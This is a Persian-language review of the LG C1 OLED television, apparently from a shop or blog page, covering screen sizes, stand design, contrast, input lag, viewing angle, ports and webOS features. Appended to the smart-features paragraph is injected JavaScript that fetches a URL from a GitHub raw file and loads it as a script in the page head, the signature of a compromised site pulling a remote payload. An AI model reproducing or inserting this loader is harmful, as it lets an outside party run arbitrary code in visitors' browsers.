دسته‌بندی نشده

نقد و بررسی تلویزیون اولد OLED ال جی C1

تلویزیون اولد OLED ال جی LG C1 جایگرین 2021 تلویزیون CX می باشد. همانطور که انتظار می رود این تلویزیون یک محصول عالی و فوق العاده است که البته علاوه بر یک سری اپدیت و تغییر ها مانند تنظیمات و کنترل حالت بازی، ریموت کنترل با طراحی متفاوت و جدید ترین ورژن از WebOS کارکردی مشابه به ورژن قدیمی تر خود دارد. این تلویزیون نیز مانند دیگر OLED های دیگر نور پس زمینه ندارد و پیکسل  های ان هر یک به تنهایی عمل می کنند و می توانند نسبت کنتراست فوق العاده بالایی را روی نمایشگر ایجاد کنند. 

اینچ های مختلف عرضه شده

برای تلویزیون ال جی C1 مانند سایر تلویزیون ها سایز و اندازه های مختلف و گوناگونی تولید شده است. هر یک از اندازه های این تلویزیون می تواند مناسب محیط و سالن های مختلف در متراژ های کوچک و بزرگ باشد. سایز 43 اینچ، 48 اینچ و 55 اینچ را در سالن های نسبتا کوچک و متوسط می توان استفاده کرد. اندازه 65 اینچ مناسب برای سالن های بزرگ و 77 و 83 اینچ برای سالن های خیلی بزرگ با متراژ بالا بسیار مناسب می باشد. اگر هر یک از این سایز ها را در متراژ مناسب خود استفاده کنید می تواند پاسخگویی مناسبی از تلویزیون هنگام تماشا فیلم ها و سریال های مختلف داشته باشید. برای اطلاع و اگاهی از اینچ های مناسب تلویزیون برای استفاده در متراژی های مختلف می توانید مقاله مرتبط به ان را مشاهده و بررسی کنید. 

طراحی زیبا و کاملا مناسب 2021

تلویزیون اولد C1 ال جی ظاهری کاملا نزدیک و مشابه به تلویزیون های ال جی CX و C9 دارد. این تلویزیون در هر محیطی می تواند زیبایی و درخشش عالی داشته باشد. پایه این تلویزیون از تلویزیون های دیگر 2021 که معمولا به صورت دو شاخه ساخته می شوند کاملا متفاوت است و با وجود اینکه مقدار فضای بیشتری را اشغال می کند اما جلوه ای جذاب دارد و زیبایی منحصر به فردی را به تلویزیون داده است.  این پایه تقریبا بیشتر فضای زیرین تلویزیون را به خود اختصاص داده است و پهنای ان کمی از تلویزیون کوچک تر است بنابراین برای این تلویزیون نیاز به یک میز بزرگ خواهید داشت. این پایه در قسمت جلویی بلندی زیادی ندارد و نمایشگر از ان فاصله چندانی ندارد بنابراین قرار دادن ساندبار در جلو تلویزیون قسمتی از نمایشگر را می پوشاند. قسمت پشتی نیز همانند CX طراحی شده است و نیمه پایین قسمت پشتی ان از پلاستیک ساخته شده است. قسمت بالایی بدنه و پایه ها اما ساختاری فلزی دارند. در قسمت پشتی پایه نیز یک جایگاه مخصوص برای سیم و کابل ها استفاده شده است که باعث ایجاد نظم بیشتر در ظاهر تلویزیون و جلوگیری از بهم ریختگی سیم ها خواهد بود. حاشه و فریم های اطراف نمایشگر به صورت کاملا تخت بدون برجستگی و در اندازه و قطر بسیار باریک ساخته شده اند. قسمت بالایی تلویزیون در اندازه بسیار ظریف و باریکی ساخته شده است در حالی که قسمت پایین ان ضخامت بیشتری دارد بنابراین هنگامی که تلویزیون به دیوار وصل می شود مقداری فاصله از ان خواهد داشت و مانند تلویزیون G1 OLED کاملا به دیوار نخواهد چسبید. از نظر کیفیت این محصول فوق العاده می باشد و از بدنه بسیار مقاوم با کیفیت بالا و کوالتی مرغوب برخوردار است. 

نمایش محتویات 

مانند دیگر نمایشگر های OLED تلویزیون C1 ال جی نیز عملکردی عالی دارد و می توان گفت زمانی که تمامی پیکسل ها به صورت تکی کاملا خاموش می شوند کنتراست تلویزیون به حد بی نهایت خواهد رسید. این تلویزیون ال جی رنگ های مشکی بسیار عمیق تر و خاص تری از تمامی محصولات LED و LCD ارائه می دهد. ار نظر سطح کنتراست تلویزیون هایسنس مدل U9DG به این تلویزیون تا حدی نزدیک می باشد. البته باید به این نکته توجه داشت که بر خلاف تلویزیون های ال سی دی میزان کنتراست در بین تلویزیون های اولد و حتی یک مدل خاص نیز به دلیل نداشتن نور پس زمینه و عملکرد فردی پیکسل ها برابر نخواهد بود. از نظر کیفیت نمایش تلویزیون در سطح بالایی قرار دارد و تصاویر با کیفیت فورکی بدون هیچ مشکلی روی نمایشگر ارائه خواهند شد. محتویات 1080p نیز همانند فورکی جلوه ای زیبا و عالی دارند. LG C1 OLED محتویات 480p و 720p را به اسانی ارتقا می دهد و با کیفیت عالی به نمایش خواهد گذاشت. از نظر تاخیر ورودی تلویزیون ال جی در حالت بازی عملکردی عالی دارد. در این محصول 2021 یک تنظیمات جدید در منو Game Optimizer استفاده شده است که به نام Prevent Input Delay قرار داده شده است. در این تنظیمات دو حالت استاندارد Standard و BOOST وجود دارد در حالت استاندارد input lag عملکردی بهتر دارد و با فرستاندن سیگنال های 120 هرتز به صورت مرتب صحنه ها را رفرش خواهد کرد بنابراین کارکرد بهتری در اجرا بازی ها خواهد داشت. تنظیمات BOOST در حالت های 60 هرتز عملکردی ضعیف تر نسبت به CX خواهد داشت. 

زاویه دید

تلویزیون LG C1 OLED زاویه دید بسیار گسترده و فوق العاده ای دارد به صورتی که می توان گفت از نظر زاویه دید عملکردی بی نظیر و منحصر به فرد را انجام می دهد. تصاویر در قسمت های حاشیه ای کیفیت و جنب و جوش خود را حفظ می کنند و همانند قسمت های مرکزی کیفیتی بهینه دارند بنابراین می توان به اسانی با افرادی زیادی به تماشا بازی ها و فیلم های مختلف در هر زاویه از تلویزیون و در قسمت های مختلف اتاق پرداخت. 

درگاه های ارتباطی

درگاه های ارتباطی بر روی بسیاری از تلویزیون ها تعبیه می شوند و برای گسترش ارتباطات تلویزیون با دستگاه های دیگر صوتی و تصویری استفاده می شوند. با این درگاه ها می توان به اسانی محتویات مختلف دستگاه های دیجیتالی را با استفاده از سیم به تلویزیون انتقال داد. برای تلویزیون C1 تعداد 4 درگاه HDMI و 3 عدد ورودی USB تعبیه شده است و برای هر یک از ورودی های انالوگ و خروجی صدا دیجیتال 1 پورت روی بدنه استفاده شده است.  

ویژگی های اسمارت 

ویژگی های اسمارت تعبیه شده برای تلویزیون ال جی اولد C1 بسیار عالی و در سطح بالایی قرار دارد. این تلویزیون با ورژن جدید از پلتفرم WebOS 6.0 عرضه شده است. استفاده از این پلتفرم هوشمند بسیار اسان است و اپلیکیشن های مختلفی را ارائه می دهد. اپ استور می تواند رنج گسترده ای از اپلیکیشن های مختلف را در اختیار کاربر قرار دهد. هوش مصنوعی ThinQ و کنترل صوتی نیز با تعبیه دستیار های صوتی برای کاربران فراهم خواهد بود.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *